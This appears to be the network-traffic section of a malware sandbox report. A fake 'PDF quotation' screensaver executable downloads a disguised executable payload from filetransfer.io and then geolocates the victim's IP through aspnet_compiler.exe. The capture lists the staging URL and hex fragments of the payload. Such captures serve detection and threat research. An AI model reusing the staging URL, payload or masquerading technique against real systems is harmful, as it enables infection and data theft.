Sep 26, 2024 09:24:14.021230936 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:24:14.543195963 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9ed366a3925d47661488969f01e9de48 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49735	193.122.130.0	80	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:24:15.166368008 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:24:16.007286072 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d7500d7690702ff196b3915550f9391e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	188.114.97.3	443	6044	C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:23:19 UTC	95	OUT	GET /data-package/Ky4pZ0WB/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-09-26 07:23:19 UTC	1074	IN	HTTP/1.1 302 Found Date: Thu, 26 Sep 2024 07:23:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=fbegh31s08vkf5dnudmvb3pubr; expires=Thu, 10-Oct-2024 07:23:19 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s24.filetransfer.io/storage/download/klH4VFXHnzlT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSnyD%2BPCmD14U55oLw1KhMDJGzsqXeaX6ZEC9jNrzhf%2BNkTgCy%2F5pl4tshd32fNc%2F3eXnWu6ZiE3M0twBpe5gqxRTZAa5SCn%2F%2FfpeRD06Ci6j6UaKyVPTvomijs%2FjTz5uXo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8c91820458d27c6a-EWR
2024-09-26 07:23:19 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 34 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 6b 6c 48 34 56 46 58 48 6e 7a 6c 54 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/klH4VFXHnzlT">Please click here to continue</a>.</p>
2024-09-26 07:23:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	188.114.97.3	443	6044	C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:23:20 UTC	98	OUT	GET /storage/download/klH4VFXHnzlT HTTP/1.1 Host: s24.filetransfer.io Connection: Keep-Alive
2024-09-26 07:23:21 UTC	1026	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:23:21 GMT Content-Type: application/octet-stream Content-Length: 2054144 Connection: close Last-Modified: Wed, 25 Sep 2024 07:31:09 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=50d5196d52eadc458faa37754a3a999a; expires=Thu, 10-Oct-2024 07:23:20 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Vdaykckgctm.wav" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "66f3bc3d-1f5800" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8X30q8iH9GCNq0UAY6N%2Ft8acvXhw0PrYWItvxW7ghrgKJzZZOPCgsY3q3vr8xQmpN6x5dnbC4JzpbUH9SP7s0I3H%2FkqaFXVXT36nRblG9idJJyfwOXyf4HsY8LL0F5OKClMmiTPV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91820caab4447a-EWR
2024-09-26 07:23:21 UTC	343	IN	Data Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30 Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 30 30 30 32 30 30 30 30 30 30 30 45 30 30 46 30 30 30 30 30 30 34 30 30 30 30 30 32 30 30 30 30 30 30 30 30 32 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 31 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 30 34 30 38 35 30 30 30 30 31 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 46 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 43 32 30 46 30 30 34 42 30 30 30 30 30 30 30 30 45 30 30 46 30 30 32 34 30 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 43 30 30 30 30 30 30 30 30 30 30 30 30 Data Ascii: 00020000000E00F00000040000020000000020000040000000000000004000000000000000020100000020000000000000300408500001000001000000000100000100000000000000F000000000000000000000000C20F004B00000000E00F002403000000000000000000000000000000000000000010000C000000000000
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 30 30 32 38 39 33 30 34 30 30 30 36 32 41 30 30 33 41 32 42 30 35 32 38 36 39 33 31 33 39 33 31 30 30 32 38 34 37 30 33 30 30 30 36 32 41 30 30 34 32 32 42 30 35 32 38 42 30 31 45 32 45 33 34 37 45 30 31 30 30 30 30 30 34 31 34 46 45 30 31 32 41 30 30 30 30 30 30 33 36 32 42 30 35 32 38 36 38 45 43 35 45 36 35 37 45 30 31 30 30 30 30 30 34 32 41 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 39 32 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 45 30 30 30 30 30 30 35 37 30 30 30 30 30 Data Ascii: 0028930400062A003A2B0528693139310028470300062A00422B0528B01E2E347E0100000414FE012A000000362B052868EC5E657E010000042A00001330030004000000000000000000002A13300300800000000100001128920300062001000000FE0E00003800000000FE0C00004503000000050000002E0000005700000
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 37 42 30 30 30 30 30 30 32 42 30 33 30 30 30 30 41 36 30 33 30 30 30 30 33 39 30 30 30 30 30 30 31 37 30 30 30 30 30 31 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 34 41 30 30 30 30 30 30 37 42 30 31 30 30 30 30 43 35 30 31 30 30 30 30 33 39 30 30 30 30 30 30 31 37 30 30 30 30 30 31 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 Data Ascii: 20000172A000000120000142A0000000330080004000000000000000000172A411C0000000000007B0000002B030000A603000039000000170000010330080004000000000000000000172A411C0000000000004A0000007B010000C501000039000000170000011330030004000000000000000000172A1330030004000000
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 34 30 30 38 31 30 45 30 30 30 30 30 31 30 30 30 30 31 31 32 38 39 32 30 33 30 30 30 36 32 30 31 42 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 32 36 30 30 30 30 30 30 42 41 30 32 30 30 30 30 42 32 30 41 30 30 30 30 35 32 30 34 30 30 30 30 44 41 30 42 30 30 30 30 43 38 30 30 30 30 30 30 34 34 30 43 30 30 30 30 37 38 30 39 30 30 30 30 34 42 30 32 30 30 30 30 45 37 30 39 30 30 30 30 45 42 30 31 30 30 30 30 37 33 30 44 30 30 30 30 32 46 30 33 30 30 30 30 32 42 30 38 30 30 30 30 33 43 30 41 30 30 30 30 31 Data Ascii: A2FFFFFF2620000000003897FFFFFF120000172A000000120000142A00000013300400810E0000010000112892030006201B000000FE0E00003800000000FE0C00004526000000BA020000B20A000052040000DA0B0000C8000000440C0000780900004B020000E7090000EB010000730D00002F0300002B0800003C0A00001
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 30 36 30 30 30 30 32 42 38 30 34 30 30 30 30 30 30 34 32 30 31 37 30 30 30 30 30 30 33 38 37 38 46 44 46 46 46 46 32 30 42 39 32 46 43 39 33 30 32 30 30 33 30 30 30 30 30 30 36 32 32 30 46 31 38 39 34 36 46 41 36 31 37 45 35 39 30 32 30 30 30 34 37 42 35 37 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 30 42 35 30 38 37 46 32 43 32 30 43 30 35 32 37 36 34 38 36 31 32 30 33 39 46 37 31 42 37 36 36 31 37 45 35 39 30 32 30 30 30 34 37 42 37 33 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 30 37 30 30 30 30 32 42 38 30 32 42 30 30 30 30 30 34 32 30 31 38 30 30 30 30 30 30 33 38 31 38 46 44 46 46 46 46 32 30 37 39 Data Ascii: EBA020004285A090006280600002B804000000420170000003878FDFFFF20B92FC93020030000006220F18946FA617E590200047B57020004617EBA020004285A09000620B5087F2C20C0527648612039F71B76617E590200047B73020004617EBA020004285A090006280700002B802B00000420180000003818FDFFFF2079
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 32 38 39 34 41 35 32 30 44 36 46 35 35 38 43 31 36 31 37 45 35 39 30 32 30 30 30 34 37 42 36 35 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 30 44 30 30 30 30 32 42 38 30 33 38 30 30 30 30 30 34 32 30 30 30 30 30 30 30 30 30 37 45 35 39 30 32 30 30 30 34 37 42 36 39 30 32 30 30 30 34 33 41 41 44 46 41 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 41 32 46 41 46 46 46 46 32 30 31 34 30 32 37 37 41 34 32 30 31 32 43 34 38 43 38 30 36 31 37 45 35 39 30 32 30 30 30 34 37 42 35 30 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 30 33 37 37 42 42 38 36 44 32 30 45 46 37 37 35 38 37 36 36 31 37 45 35 39 30 32 30 30 30 34 37 42 36 39 30 32 30 30 30 34 36 31 37 45 42 41 30 Data Ascii: 2894A520D6F558C1617E590200047B65020004617EBA020004285A090006280D00002B803800000420000000007E590200047B690200043AADFAFFFF26200000000038A2FAFFFF20140277A42012C48C80617E590200047B50020004617EBA020004285A09000620377BB86D20EF775876617E590200047B69020004617EBA0
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 46 46 46 32 36 32 30 30 38 30 30 30 30 30 30 33 38 33 30 46 38 46 46 46 46 32 30 41 38 35 42 37 44 46 33 32 30 38 42 33 37 44 31 42 42 36 31 37 45 35 39 30 32 30 30 30 34 37 42 33 34 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 30 32 44 31 32 35 41 39 45 32 30 46 30 35 31 45 45 31 44 36 31 32 30 34 41 31 42 46 39 41 34 36 31 37 45 35 39 30 32 30 30 30 34 37 42 34 45 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 31 34 30 30 30 30 32 42 38 30 33 42 30 30 30 30 30 34 32 30 30 33 30 30 30 30 30 30 37 45 35 39 30 32 30 30 30 34 37 42 36 37 30 32 30 30 30 34 33 41 43 43 46 37 46 46 46 46 32 36 32 30 30 35 30 30 30 30 30 30 33 38 43 31 46 37 46 46 46 46 37 45 39 35 30 32 30 30 Data Ascii: FFF2620080000003830F8FFFF20A85B7DF3208B37D1BB617E590200047B34020004617EBA020004285A090006202D125A9E20F051EE1D61204A1BF9A4617E590200047B4E020004617EBA020004285A090006281400002B803B00000420030000007E590200047B670200043ACCF7FFFF26200500000038C1F7FFFF7E950200
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 37 31 30 32 30 30 30 34 33 41 38 37 46 35 46 46 46 46 32 36 32 30 31 39 30 30 30 30 30 30 33 38 37 43 46 35 46 46 46 46 32 30 39 45 43 44 43 39 32 36 36 36 32 30 30 42 31 38 46 45 39 44 36 31 37 45 35 39 30 32 30 30 30 34 37 42 38 41 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 30 44 36 32 36 43 41 46 33 32 30 41 44 32 34 32 38 43 34 36 31 37 45 35 39 30 32 30 30 30 34 37 42 32 43 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 31 41 30 30 30 30 32 42 38 30 32 44 30 30 30 30 30 34 32 30 30 34 30 30 30 30 30 30 33 38 32 37 46 35 46 46 46 46 32 41 32 30 38 41 32 38 44 31 45 30 32 30 41 38 38 37 37 41 45 30 35 39 32 30 45 35 46 41 31 42 32 37 36 31 37 45 35 39 30 32 30 30 30 Data Ascii: 710200043A87F5FFFF262019000000387CF5FFFF209ECDC92666200B18FE9D617E590200047B8A020004617EBA020004285A09000620D626CAF320AD2428C4617E590200047B2C020004617EBA020004285A090006281A00002B802D00000420040000003827F5FFFF2A208A28D1E020A8877AE05920E5FA1B27617E5902000
2024-09-26 07:23:21 UTC	1369	IN	Data Raw: 38 35 41 30 39 30 30 30 36 32 38 32 30 30 30 30 30 32 42 38 30 33 43 30 30 30 30 30 34 32 30 31 44 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 43 33 46 32 46 46 46 46 32 30 41 36 42 45 31 31 46 34 32 30 30 41 38 45 41 34 41 37 36 31 37 45 35 39 30 32 30 30 30 34 37 42 38 35 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 30 45 37 39 33 30 35 34 41 32 30 44 30 31 30 34 46 35 43 36 31 37 45 35 39 30 32 30 30 30 34 37 42 36 43 30 32 30 30 30 34 36 31 37 45 42 41 30 32 30 30 30 34 32 38 35 41 30 39 30 30 30 36 32 38 32 31 30 30 30 30 32 42 38 30 33 46 30 30 30 30 30 34 32 30 32 30 30 30 30 30 30 30 37 45 35 39 30 32 30 30 30 34 37 42 32 46 30 32 30 30 30 34 33 41 36 39 46 32 46 46 46 46 32 36 32 30 31 37 30 30 30 30 Data Ascii: 85A090006282000002B803C000004201D000000FE0E000038C3F2FFFF20A6BE11F4200A8EA4A7617E590200047B85020004617EBA020004285A09000620E793054A20D0104F5C617E590200047B6C020004617EBA020004285A090006282100002B803F00000420200000007E590200047B2F0200043A69F2FFFF2620170000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:24:08 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 280 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXloarF3RbMQilrS%2FImJp6bp8eDY1cXbIegED1lQv5S30ypeF3ZjR5BfKjq1D5Wt%2FcpE35ZIHyoVsRAxGG6BFV3Pc04XtguDoqaxq89vsoWygzXTFqXq%2FiGzm0ryVJbPiI7TynzT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91833a59590f6b-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 07:24:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49723	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:09 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:24:09 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 281 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=waryFBPtQICSGKEwv6lHxy1GaM5J3Qq5B7cppgMfvL7YVBzGHpvx6XcoeLH5qYal%2F93Dh%2BsZFvjGmEHpMkyp7s0Co2jmbbvukkEVGI4%2BePI%2BQRwq%2Bxe3VwGF2Sri%2BLpLPJRrK7kU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91833f1a960f37-EWR
2024-09-26 07:24:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:10 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:24:10 UTC	672	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:24:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 282 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7G4FM61WjR0vqhzY62bLuhqQXsbSrfXgKAG%2FuIF8jJsTZRW14HM8rNAEDHipHNQ2pc0yrtcWiBqlFHWxOUz5s2ieMMPXiQMSqxT6exnELXYiKkobbX%2BECTOEQpbRWWhYOg4Bl0Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9183464bf88c17-EWR
2024-09-26 07:24:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:24:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49728	188.114.96.3	443	5792	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:24:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
